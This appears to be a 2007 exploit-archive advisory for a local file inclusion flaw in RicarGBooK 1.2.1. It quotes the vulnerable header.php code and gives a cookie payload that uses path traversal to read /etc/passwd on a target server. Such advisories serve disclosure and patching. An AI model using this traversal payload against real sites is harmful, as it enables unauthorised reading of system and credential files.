[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : RicarGBooK 1.2.1 (header.php lang) Local File Inclusion Vulnerability
# Published : 2007-04-12
# Author : Dj7xpl
# Previous Title : WebKalk2 1.9.0 (absolute_path) Remote File Inclusion Vulnerability
# Next Title : MyBulletinBoard (MyBB) <= 1.2.2 (CLIENT-IP) SQL Injection Exploit
-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-
RicarGBooK 1.2.1
-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-
* Author :
Dj7xpl / Dj7xpl[at]Yahoo[dot]com
* Type :
Local File Inclusion Vulnerabilitiy By Cookie
* Download :
http://ricargbook.adrielmedia.com
-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-
* Vuln Code : -=-= Header.php =-=-
if (isset($HTTP_COOKIE_VARS["lang"])) {
$guest_lang = $HTTP_COOKIE_VARS["lang"];
include ('languages/'.$guest_lang);
} else {
$guest_lang = $language;
include ('languages/'.$language);
-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-
* Vuln And Example Picture :
Edit Cookie :
Server : http://[Target]
Name : lang
Value : Local File E.g : ../../../../etc/passwd
[X] http://dj7xpl.by.ru/r1.jpg
[X] http://dj7xpl.by.ru/r2.jpg
-=-=-=-=-=-=-=-=-=-=-=-=D=J=7=X=P=L=-=-=-=-=-=-=-=-=-=-=-=-=-
# Sp Tnx : str0ke
# www.Syue.com [2007-04-12]